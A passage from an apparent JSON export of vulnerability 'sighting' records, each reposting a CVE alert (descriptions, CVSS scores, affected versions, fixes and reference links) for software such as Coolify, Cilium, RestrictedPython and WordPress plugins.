4.0.0-beta.361, the missing authorization allows any authenticated user to escalate his or any other team members privileges to any role, including the owner role. He's also able to kick every other member out of the team, including admins and owners. This allows the attacker to access the `Terminal` feature and execute remote commands. Version 4.0.0-beta.361 fixes the issue.\n\ud83d\udccf Published: 2025-01-24T16:35:21.439Z\n\ud83d\udccf Modified: 2025-01-24T16:35:21.439Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-9w72-9qww-qj6g", "creation_timestamp": "2025-01-24T17:05:05.000000Z"}, {"uuid": "a0c45f66-e4a8-40a7-be1b-758f7eef4f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3W2C-JFR2-9PG9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2953", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22609\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.361, the missing authorization allows any authenticated user to attach any existing private key on a coolify instance to his own server. If the server configuration of IP / domain, port (most likely 22) and user (root) matches with the victim's server configuration, then the attacker can use the `Terminal` feature and execute arbitrary commands on the victim's server. Version 4.0.0-beta.361 fixes the issue.\n\ud83d\udccf Published: 2025-01-24T16:30:34.465Z\n\ud83d\udccf Modified: 2025-01-24T16:33:08.221Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-3w2c-jfr2-9pg9", "creation_timestamp": "2025-01-24T17:05:11.000000Z"}, {"uuid": "3aebb26e-a1de-4be3-86a1-5a7c01ff2933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H78M-J95M-5356", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2608", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23047\n\ud83d\udd39 Description: Cilium is a networking, observability, and security solution with an eBPF-based dataplane. An insecure default `Access-Control-Allow-Origin` header value could lead to sensitive data exposure for users of Cilium versions 1.14.0 through 1.14.7, 1.15.0 through 1.15.11, and 1.16.0 through 1.16.4 who deploy Hubble UI using either Cilium CLI or via the Cilium Helm chart. A user with access to a Hubble UI instance affected by this issue could leak configuration details about the Kubernetes cluster which Hubble UI is monitoring, including node names, IP addresses, and other metadata about workloads and the cluster networking configuration. In order for this vulnerability to be exploited, a victim would have to first visit a malicious page. This issue is fixed in Cilium v1.14.18, v1.15.12, and v1.16.5. As a workaround, users who deploy Hubble UI using the Cilium Helm chart directly can remove the CORS headers from the Helm template as shown in the patch from commit a3489f190ba6e87b5336ee685fb6c80b1270d06d.\n\ud83d\udccf Published: 2025-01-22T17:20:09.715Z\n\ud83d\udccf Modified: 2025-01-22T17:20:09.715Z\n\ud83d\udd17 References:\n1. https://github.com/cilium/cilium/security/advisories/GHSA-h78m-j95m-5356\n2. https://github.com/cilium/cilium/commit/a3489f190ba6e87b5336ee685fb6c80b1270d06d", "creation_timestamp": "2025-01-22T18:02:40.000000Z"}, {"uuid": "fffedae2-c767-4029-9453-4c8c88db65c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GVRQ-CG5R-7CHP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2823", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32081\n\ud83d\udd39 Description: Vert.x STOMP is a vert.x implementation of the STOMP specification that provides a STOMP server and client. From versions 3.1.0 until 3.9.16 and 4.0.0 until 4.4.2, a Vert.x STOMP server processes client STOMP frames without checking that the client send an initial CONNECT frame replied with a successful CONNECTED frame. The client can subscribe to a destination or publish message without prior authentication. Any Vert.x STOMP server configured with an authentication handler is impacted. The issue is patched in Vert.x 3.9.16 and 4.4.2. There are no trivial workarounds.\n\ud83d\udccf Published: 2023-05-12T13:49:56.969Z\n\ud83d\udccf Modified: 2025-01-23T20:55:31.692Z\n\ud83d\udd17 References:\n1. https://github.com/vert-x3/vertx-stomp/security/advisories/GHSA-gvrq-cg5r-7chp\n2. https://github.com/vert-x3/vertx-stomp/commit/0de4bc5a44ddb57e74d92c445f16456fa03f265b", "creation_timestamp": "2025-01-23T21:03:28.000000Z"}, {"uuid": "649eb30d-7f20-43dc-ad8f-1df3cfe2e4ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P989-2F5W-9CF6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2781", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24034\n\ud83d\udd39 Description: Himmelblau is an interoperability suite for Microsoft Azure Entra ID and Intune. Starting in version 0.7.0 and prior to versions 0.7.15 and 0.8.3, Himmelblau is vulnerable to leaking credentials in debug logs. When debug logging is enabled, user access tokens are inadvertently logged, potentially exposing sensitive authentication data. Similarly, Kerberos Ticket-Granting Tickets (TGTs) are logged when debug logging is enabled. Both issues pose a risk of exposing sensitive credentials, particularly in environments where debug logging is enabled. Himmelblau versions 0.7.15 and 0.8.3 contain a patch that fixes both issues. Some workarounds are available for users who are unable to upgrade. For the **logon compliance script issue**, disable the `logon_script` option in `/etc/himmelblau/himmelblau.conf`, and avoid using the `-d` flag when starting the `himmelblaud` daemon. For the Kerberos CCache issue, one may disable debug logging globally by setting the `debug` option in `/etc/himmelblau/himmelblau.conf` to `false` and avoiding the `-d` parameter when starting `himmelblaud`.\n\ud83d\udccf Published: 2025-01-23T17:38:57.957Z\n\ud83d\udccf Modified: 2025-01-23T17:38:57.957Z\n\ud83d\udd17 References:\n1. https://github.com/himmelblau-idm/himmelblau/security/advisories/GHSA-p989-2f5w-9cf6\n2. https://github.com/himmelblau-idm/himmelblau/commit/1216804f15ce5dc74bb5da48b5508c41d2ece8fa\n3. https://github.com/himmelblau-idm/himmelblau/releases/tag/0.7.15\n4. https://github.com/himmelblau-idm/himmelblau/releases/tag/0.8.3\n5. https://manpages.opensuse.org/Tumbleweed/himmelblau/himmelblau.conf.5.en.html\n6. https://manpages.opensuse.org/Tumbleweed/himmelblau/himmelblaud.8.en.html", "creation_timestamp": "2025-01-23T18:03:13.000000Z"}, {"uuid": "c9fa9820-4600-4f10-9255-01c2b27d0e18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3X37-4F59-7Q93", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3133", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-3x37-4f59-7q93\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The VikBooking Hotel Booking Engine &amp; PMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.2. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to change plugin access privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows attackers with subscriber-level privileges and above to upload arbitrary files on the affected site's server which may make remote code execution possible.\n\ud83d\udccf Published: 2025-01-26T12:30:31Z\n\ud83d\udccf Modified: 2025-01-26T12:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11641\n2. https://plugins.trac.wordpress.org/changeset/3225861/vikbooking\n3. https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb6611d-7a4b-4ca8-b9cc-c156437e89b5?source=cve", "creation_timestamp": "2025-01-26T13:06:18.000000Z"}, {"uuid": "4e600f0f-a469-40eb-b4da-5937a1bb80d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R793-4Q47-GMJ4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3144", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-r793-4q47-gmj4\n\ud83d\udd25 CVSS Score: 6.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Itechscripts School Management Software 2.75. It has been classified as critical. This affects an unknown part of the file /notice-edit.php. The manipulation of the argument aid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udccf Published: 2025-01-26T18:30:32Z\n\ud83d\udccf Modified: 2025-01-26T18:30:32Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2017-20196\n2. https://vuldb.com/?ctiid.95307\n3. https://vuldb.com/?id.95307\n4. https://www.exploit-db.com/exploits/41034", "creation_timestamp": "2025-01-26T19:07:25.000000Z"}, {"uuid": "43f03483-d000-4413-9b25-588f1fe5abc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GMJ9-H825-CHQ2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2783", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22153\n\ud83d\udd39 Description: RestrictedPython is a tool that helps to define a subset of the Python language which allows to provide a program input into a trusted environment. Via a type confusion bug in versions of the CPython interpreter starting in 3.11 and prior to 3.13.2 when using `try/except*`, RestrictedPython starting in version 6.0 and prior to version 8.0 could be bypassed. The issue is patched in version 8.0 of RestrictedPython by removing support for `try/except*` clauses. No known workarounds are available.\n\ud83d\udccf Published: 2025-01-23T17:34:27.056Z\n\ud83d\udccf Modified: 2025-01-23T17:34:27.056Z\n\ud83d\udd17 References:\n1. https://github.com/zopefoundation/RestrictedPython/security/advisories/GHSA-gmj9-h825-chq2\n2. https://github.com/zopefoundation/RestrictedPython/commit/48a92c5bb617a647cffd0dadd4d5cfe626bcdb2f", "creation_timestamp": "2025-01-23T18:03:14.000000Z"}, {"uuid": "31e1676a-9c83-4b86-8a4b-693192e8b950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3785-M3X6-8Q8C", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3106", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-3785-m3x6-8q8c\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Maximo Application Suite 8.10, 8.11, and 9.0 - Monitor Component stores source code on the web server that could aid in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35144\n2. https://www.ibm.com/support/pages/node/7174953", "creation_timestamp": "2025-01-25T17:06:23.000000Z"}, {"uuid": "3b6656f4-b8d6-46b1-a1c0-9ae71fc82e67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-466P-J3VQ-MWQ3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3105", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-466p-j3vq-mwq3\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Control Center 6.2.1 and 6.3.1 \n\n\n\n\n\ncould allow a remote attacker to enumerate usernames due to an observable discrepancy between login attempts.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35114\n2. https://www.ibm.com/support/pages/node/7174842", "creation_timestamp": "2025-01-25T17:06:22.000000Z"}, {"uuid": "cb556c2e-c339-4f3a-b3ed-9a5637ef6afa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MHH-27V7-3VCX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2821", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32073\n\ud83d\udd39 Description: WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3.\n\ud83d\udccf Published: 2023-05-12T13:34:34.164Z\n\ud83d\udccf Modified: 2025-01-23T20:59:41.432Z\n\ud83d\udd17 References:\n1. https://github.com/WWBN/AVideo/security/advisories/GHSA-2mhh-27v7-3vcx\n2. https://github.com/WWBN/AVideo/commit/1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3", "creation_timestamp": "2025-01-23T21:03:27.000000Z"}, {"uuid": "05b46e40-afa8-4c72-89ae-5b2d07a357d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HCF-78CF-XWQV", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3168", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-9hcf-78cf-xwqv\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Social Share Buttons for WordPress plugin through 2.7 allows an unauthenticated user to upload arbitrary images and change the path where they are uploaded\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13117\n2. https://wpscan.com/vulnerability/3234cdac-f328-4f1e-a1de-31fbd86aefb9", "creation_timestamp": "2025-01-27T07:08:00.000000Z"}, {"uuid": "dcf51491-4ea8-43cc-b35c-1a308cdfcc94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9GRV-P46V-P3FP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3169", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-9grv-p46v-p3fp\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Dental Optimizer Patient Generator App WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13052\n2. https://wpscan.com/vulnerability/671d5eef-c496-4047-9d01-8ab8a94cdc72", "creation_timestamp": "2025-01-27T07:08:00.000000Z"}, {"uuid": "1bdb39ee-8469-46df-bf2e-90ab761c3c5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2J8-VJG7-386R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3177", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x2j8-vjg7-386r\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A cross-site scripting (XSS) vulnerability in the Product module of Dolibarr v21.0.0-beta allows attackers to execute arbitrary web scripts or HTMl via a crafted payload injected into the Title parameter.\n\ud83d\udccf Published: 2025-01-27T18:32:01Z\n\ud83d\udccf Modified: 2025-01-27T20:50:36Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-55228\n2. https://github.com/Dolibarr/dolibarr/commit/56710ce9b79a97df093f586c90bdaf6cce6a5808\n3. https://github.com/Dolibarr/dolibarr/commit/9aa24d9d9aeab36358c725dae3fe20c9631082e7\n4. https://github.com/Dolibarr/dolibarr/commit/c0250e4c9106b5c889e512a4771f0205d4f99b99\n5. https://gist.github.com/Dqtdqt/a942bbce9a5fc851dce366902411c768\n6. https://github.com/Dolibarr/dolibarr\n7. https://github.com/Dolibarr/dolibarr/security/policy", "creation_timestamp": "2025-01-27T21:08:24.000000Z"}, {"uuid": "b80aa49b-4d58-4b57-b1b4-26eab0799eec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F2GF-JVMH-VQ73", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2942", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24025\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.380, the tags page allows users to search for tags. If the search does not return any results, the query gets reflected on the error modal, which leads to cross-site scripting. Version 4.0.0-beta.380 fixes the issue.\n\ud83d\udccf Published: 2025-01-24T16:46:04.276Z\n\ud83d\udccf Modified: 2025-01-24T16:46:04.276Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-f2gf-jvmh-vq73", "creation_timestamp": "2025-01-24T17:04:56.000000Z"}, {"uuid": "41ae77d7-df89-4afe-ba68-0f85b2fe2d73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X99J-R8VV-GWWJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2948", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32075\n\ud83d\udd39 Description: The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management. In `pimcore/customer-management-framework-bundle` prior to version 3.3.9, business logic errors are possible in the `Conditions` tab since the counter can be a negative number. This vulnerability is capable of the unlogic in the counter value in the Conditions tab. Users should update to version 3.3.9 to receive a patch or, as a workaround, or apply the patch manually.\n\ud83d\udccf Published: 2023-05-11T16:39:37.634Z\n\ud83d\udccf Modified: 2025-01-24T16:38:09.717Z\n\ud83d\udd17 References:\n1. https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-x99j-r8vv-gwwj\n2. https://github.com/pimcore/customer-data-framework/commit/e3f333391582d9309115e6b94e875367d0ea7163.patch\n3. https://github.com/pimcore/customer-data-framework/releases/tag/v3.3.9\n4. https://huntr.dev/bounties/cecd7800-a996-4f3a-8689-e1c2a1e0248a/", "creation_timestamp": "2025-01-24T17:05:04.000000Z"}, {"uuid": "8b1abb7e-b1b5-491a-b404-2b4e7ef91053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1087", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5477", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0650\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). Specially crafted UDP packets may bypass egress access control lists (ACLs) in OVN installations configured with a logical switch with DNS records set on it and if the same switch has any egress ACLs configured. This issue can lead to unauthorized access to virtual machines and containers running on the OVN network.\n\ud83d\udccf Published: 2025-01-23T16:34:31.390Z\n\ud83d\udccf Modified: 2025-02-26T06:53:05.605Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1083\n2. https://access.redhat.com/errata/RHSA-2025:1084\n3. https://access.redhat.com/errata/RHSA-2025:1085\n4. https://access.redhat.com/errata/RHSA-2025:1086\n5. https://access.redhat.com/errata/RHSA-2025:1087\n6. https://access.redhat.com/errata/RHSA-2025:1088\n7. https://access.redhat.com/errata/RHSA-2025:1089\n8. https://access.redhat.com/errata/RHSA-2025:1090\n9. https://access.redhat.com/errata/RHSA-2025:1091\n10. https://access.redhat.com/errata/RHSA-2025:1092\n11. https://access.redhat.com/errata/RHSA-2025:1093\n12. https://access.redhat.com/errata/RHSA-2025:1094\n13. https://access.redhat.com/errata/RHSA-2025:1095\n14. https://access.redhat.com/errata/RHSA-2025:1096\n15. https://access.redhat.com/errata/RHSA-2025:1097\n16. https://access.redhat.com/security/cve/CVE-2025-0650\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2339537\n18. https://www.openwall.com/lists/oss-security/2025/01/22/5", "creation_timestamp": "2025-02-26T07:24:00.000000Z"}, {"uuid": "57ac503a-f8cf-4345-8387-0d6d92719496", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QXH3-JGVH-X55J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3797", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-qxh3-jgvh-x55j\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\uff08\u5f71\u97ff\uff09\n\nThere is a Privilege Escalation Vulnerability on the management system of Connect-CMS.\nAffercted Version : Connect-CMS 1.7.1, 2.3.1 and earlier\n\n### Patches\uff08\u4fee\u6b63\u30d0\u30fc\u30b8\u30e7\u30f3\uff09\n\nversion 1.7.2, 2.3.1\n\n### Workarounds\uff08\u904b\u7528\u56de\u907f\u624b\u6bb5\uff09\n\nUpgrade Connect-CMS to latest version\n\ud83d\udccf Published: 2023-07-05T22:40:22Z\n\ud83d\udccf Modified: 2025-02-07T17:50:02Z\n\ud83d\udd17 References:\n1. https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-qxh3-jgvh-x55j\n2. https://github.com/opensource-workshop/connect-cms", "creation_timestamp": "2025-02-07T18:02:54.000000Z"}, {"uuid": "fe174a49-de79-4085-a798-68b57d3c059d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1802", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. https://access.redhat.com/errata/RHSA-2024:2696\n9. https://access.redhat.com/security/cve/CVE-2024-1488\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2264183", "creation_timestamp": "2025-01-24T06:12:32.000000Z"}, {"uuid": "7be1d0bd-d511-4ec0-af7a-4bf62287f016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "1ca5cf27-0d33-41a1-95b4-0427de5a28f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3F9-P6HM-5W6Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5269", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22145\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Carbon is an international PHP extension for DateTime. Application passing unsanitized user input to Carbon::setLocale are at risk of arbitrary file include, if the application allows users to upload files with .php extension in an folder that allows include or require to read it, then they are at risk of arbitrary code ran on their servers. This vulnerability is fixed in 3.8.4 and 2.72.6.\n\ud83d\udccf Published: 2025-01-08T20:40:37.545Z\n\ud83d\udccf Modified: 2025-02-25T13:07:45.559Z\n\ud83d\udd17 References:\n1. https://github.com/CarbonPHP/carbon/security/advisories/GHSA-j3f9-p6hm-5w6q\n2. https://github.com/briannesbitt/Carbon/commit/129700ed449b1f02d70272d2ac802357c8c30c58", "creation_timestamp": "2025-02-25T13:23:45.000000Z"}, {"uuid": "6c02d405-0250-4c99-9d65-ab754ea58de8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2696", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2874", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1488\n\ud83d\udd39 Description: A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.\n\ud83d\udccf Published: 2024-02-15T05:04:13.994Z\n\ud83d\udccf Modified: 2025-01-24T05:55:20.447Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1750\n2. https://access.redhat.com/errata/RHSA-2024:1751\n3. https://access.redhat.com/errata/RHSA-2024:1780\n4. https://access.redhat.com/errata/RHSA-2024:1801\n5. https://access.redhat.com/errata/RHSA-2024:1802\n6. https://access.redhat.com/errata/RHSA-2024:1804\n7. https://access.redhat.com/errata/RHSA-2024:2587\n8. 